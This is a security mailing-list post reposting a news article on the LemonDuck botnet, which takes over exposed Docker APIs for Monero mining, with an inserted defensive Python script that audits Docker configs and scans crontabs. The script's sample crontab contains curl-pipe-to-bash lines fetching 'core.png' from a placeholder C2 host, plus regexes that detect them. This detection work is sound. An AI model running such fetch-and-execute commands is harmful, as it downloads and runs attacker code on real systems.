[BreachExchange] LemonDuck botnet plunders Docker cloud instances in cryptocurrency crime wave

Matthew Wheeler mwheeler at flashpoint-intel.com
Fri Apr 22 08:34:16 EDT 2022


https://www.zdnet.com/article/lemonduck-botnet-plunders-docker-cloud-instances-in-cryptocurrency-crime-wave/

Operators of the LemonDuck botnet are targeting Docker instances in a
cryptocurrency mining campaign.

LemonDuck is cryptocurrency mining malware wrapped up in a botnet
structure. The malware exploits older vulnerabilities to infiltrate cloud
systems and servers, including the Microsoft Exchange ProxyLogon bugs,
EternalBlue, and BlueKeep.


As noted by Microsoft's security team in 2021, the threat actors behind the
malware are known to be selective when it comes to timing and may trigger
an attack when teams are focused on "patching a popular vulnerability
rather than investigating compromise."

LemonDuck has expanded its operations from Windows machines to also include
Linux and Docker. In an ongoing, active campaign, CrowdStrike says that
Docker APIs are being targeted to obtain initial access to cloud instances.

Docker is used for running containers in the cloud. On Thursday, the
cybersecurity researchers said that LemonDuck takes advantage of
misconfigured instances that expose the Docker API in order to deploy
exploit kits and load malware.

In a case observed by the team, an exposed API was abused to run a custom
Docker ENTRYPOINT instruction and download "core.png," an image file
disguised as a Bash script.

The file was downloaded from a domain in LemonDuck's "vast"
command-and-control (C2) infrastructure.

"CrowdStrike found multiple campaigns being operated via the domain
targeting Windows and Linux platforms simultaneously," the researchers
noted.

Core.png will launch a Linux cronjob inside the vulnerable container and
then download a secondary Bash file, "a.asp," the main LemonDuck payload.

The cronjob will trigger LemonDuck. The malware will first kill several
processes, including network connections, rival cryptocurrency mining
operations, and existing ties to mining pools. LemonDuck will also target
known daemons tasked with monitoring, such as Alibaba Cloud's monitoring
service.
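Two defender-side checks for the chain described above, written for this post as an added example (not CrowdStrike's or ZDNet's code): the first audits a Docker host for the misconfiguration that gives the botnet initial access, a daemon API listening on TCP without TLS client verification; the second scans a crontab for the persistence pattern described, a fetch piped into a shell or a shell interpreter run on a file with an image extension. The daemon.json text, dockerd command lines and crontab are constructed sample inputs, and the domain in them is a placeholder. The `hosts`, `tlsverify` keys and the `-H`/`--host`, `--tlsverify`, `--tlscacert`, `--tlscert`, `--tlskey` flags are real dockerd options; Docker refuses to start if `hosts` is set both in daemon.json and on the command line, so in practice only one source will be populated and the audit simply reads whichever is present.

```python
"""Audit a Docker host for an unauthenticated TCP API and scan a crontab for
fetch-and-execute persistence. Added example; all sample inputs are constructed."""
import json
import re
import shlex
from typing import List

# Constructed daemon.json: API bound on all interfaces, plain TCP, no TLS.
SAMPLE_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'

# Constructed dockerd command lines (as they would appear in `ps` or a unit file).
SAMPLE_CMDLINE = "dockerd -H fd:// -H tcp://0.0.0.0:2375"
SAMPLE_CMDLINE_TLS = ("dockerd -H fd:// -H tcp://0.0.0.0:2376 --tlsverify "
                      "--tlscacert=/etc/docker/ca.pem --tlscert=/etc/docker/server-cert.pem "
                      "--tlskey=/etc/docker/server-key.pem")

# Constructed crontab; c2.example.invalid is a placeholder, not a real indicator.
SAMPLE_CRONTAB = """\
# constructed crontab for the example
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * curl -fsSL http://c2.example.invalid/core.png | bash
*/10 * * * * bash /tmp/core.png
"""


def hosts_from_daemon_json(text: str) -> List[str]:
    """Return the 'hosts' list from daemon.json, or [] if absent or unparseable."""
    try:
        cfg = json.loads(text)
    except json.JSONDecodeError:
        return []
    hosts = cfg.get("hosts", [])
    return hosts if isinstance(hosts, list) else []


def hosts_from_cmdline(cmdline: str) -> List[str]:
    """Collect -H / --host values from a dockerd command line."""
    args = shlex.split(cmdline)
    hosts = []
    for i, arg in enumerate(args):
        if arg in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
        elif arg.startswith("--host="):
            hosts.append(arg.split("=", 1)[1])
        elif arg.startswith("-H") and len(arg) > 2:  # -Htcp://... form
            hosts.append(arg[2:])
    return hosts


def tls_verify_enabled(text: str, cmdline: str) -> bool:
    """True if client-certificate verification is requested in either source."""
    try:
        cfg = json.loads(text)
    except json.JSONDecodeError:
        cfg = {}
    if cfg.get("tlsverify") is True:
        return True
    return any(a in ("--tlsverify", "--tlsverify=true") for a in shlex.split(cmdline))


def audit_docker_api(text: str, cmdline: str) -> List[str]:
    """One finding per TCP listener that is reachable without mutual TLS, plus a
    weaker note for TLS listeners bound to every interface."""
    findings = []
    tls = tls_verify_enabled(text, cmdline)
    for h in hosts_from_daemon_json(text) + hosts_from_cmdline(cmdline):
        if not h.startswith("tcp://"):
            continue  # unix:// and fd:// sockets are local to the host
        addr = h[len("tcp://"):]
        if not tls:
            findings.append(f"unauthenticated Docker API on {addr}: any client that "
                            f"can reach it can start containers with a custom ENTRYPOINT")
        elif addr.startswith(("0.0.0.0", "[::]", ":")):
            findings.append(f"TLS-protected Docker API on {addr} is bound to all "
                            f"interfaces; restrict reachability with a firewall")
    return findings


# curl/wget output piped straight into a shell, e.g. "... | bash".
FETCH_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")
# A shell interpreter handed a file whose extension claims to be an image.
IMAGE_EXT = re.compile(r"\.(png|jpe?g|gif|bmp)\b", re.IGNORECASE)
SHELL_WORD = re.compile(r"\b(ba)?sh\b")


def suspicious_cron_lines(crontab: str) -> List[str]:
    """Return crontab entries matching the fetch-and-execute persistence pattern."""
    hits = []
    for line in crontab.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if FETCH_TO_SHELL.search(s) or (IMAGE_EXT.search(s) and SHELL_WORD.search(s)):
            hits.append(s)
    return hits


if __name__ == "__main__":
    for finding in audit_docker_api(SAMPLE_DAEMON_JSON, "dockerd"):
        print("docker:", finding)
    for entry in suspicious_cron_lines(SAMPLE_CRONTAB):
        print("cron:", entry)
```

On a live host the same functions would be fed the contents of /etc/docker/daemon.json and the dockerd line from `ps`, and the crontab check should be run over the system crontab, /etc/cron.d and every user's crontab, since the cron job in the campaign is created inside the container as well as on hosts reached over SSH.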

Now that the server has been prepared, a cryptocurrency mining operation
begins. XMRig, used to generate Monero (XMR), is launched with a
configuration set to proxy pools -- an attempt to hide the true
cryptocurrency wallet address of the attacker.

LemonDuck doesn't stop at just one Docker instance, however. The malware
will also search for SSH keys in the file system to log into other servers
and repeat its malicious operations.

"Due to the cryptocurrency boom in recent years, combined with cloud and
container adoption in enterprises, cryptomining is proven to be a
monetarily attractive option for attackers," the researchers say. "Since
cloud and container ecosystems heavily use Linux, it drew the attention of
the operators of botnets like LemonDuck, which started targeting Docker for
cryptomining on the Linux platform."